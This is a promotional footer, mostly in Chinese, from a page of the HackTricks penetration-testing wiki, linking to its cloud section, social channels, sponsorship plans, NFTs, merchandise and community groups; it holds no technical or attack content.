<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一家网络安全公司工作吗想要在HackTricks中宣传你的公司吗或者想要获取PEASS的最新版本或下载HackTricks的PDF吗请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
</details>